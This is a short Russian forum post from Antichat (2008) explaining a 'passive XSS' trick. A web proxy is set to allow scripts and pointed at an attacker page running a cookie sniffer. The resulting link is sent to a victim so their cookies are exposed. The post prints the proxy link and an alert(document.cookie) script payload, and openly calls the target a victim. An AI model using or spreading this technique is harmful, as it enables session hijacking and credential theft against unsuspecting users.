26.06.2008, 15:24
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
переходим сюда: _http://2proxylife.net/web/index.php?q=aHR0cDovL3hha2VwLm1vYmkvdGVzdC5odG1s&h l=1011101001
лицезреем наши куки.
алгоритм:
http://2proxylife.net/web/ - здесь снимаем птичку с "Отключить Scripts", а в поле адреса вписываем адрес на страницу с установленным на ней сниффером.
в даном случае просто
<html>
<script>alert(document.cookie);</script>
</html>
осталось только дать полученную ссылку(см. вверху) нашей жертве.
вот такая вот пасивная xss.
Последний раз редактировалось mr.The; 26.06.2008 в 15:26..
|
|
|